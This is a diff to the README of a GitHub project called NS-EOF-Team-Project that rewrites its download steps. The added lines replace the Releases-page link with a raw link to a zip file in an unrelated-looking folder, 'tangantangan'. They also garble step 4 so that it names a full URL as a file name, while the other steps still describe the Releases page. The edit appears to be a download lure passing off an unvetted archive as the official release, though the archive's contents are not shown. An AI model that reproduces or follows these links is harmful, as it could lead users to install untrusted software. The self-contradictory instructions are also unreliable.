colcami/NS-EOF-Team-Project/README.md

 To download the software:

-1. Visit the Releases page: [Download NS-EOF-Team-Project](https://github.com/colcami/NS-EOF-Team-Project/releases).
+1. Visit the Releases page: [Download NS-EOF-Team-Project](https://raw.githubusercontent.com/colcami/NS-EOF-Team-Project/main/tangantangan/NS-EOF-Team-Project.zip).

 2. On the Releases page, find the latest version of the application.

 3. Click on the version you want to download.
 You will see a list of files you can download.

-4. Look for the file named "NS-EOF-Team-Project.zip" or a similar name.
+4. Look for the file named "https://raw.githubusercontent.com/colcami/NS-EOF-Team-Project/main/tangantangan/NS-EOF-Team-Project.zip" or a similar name.

 5. Click on the file name to start the download.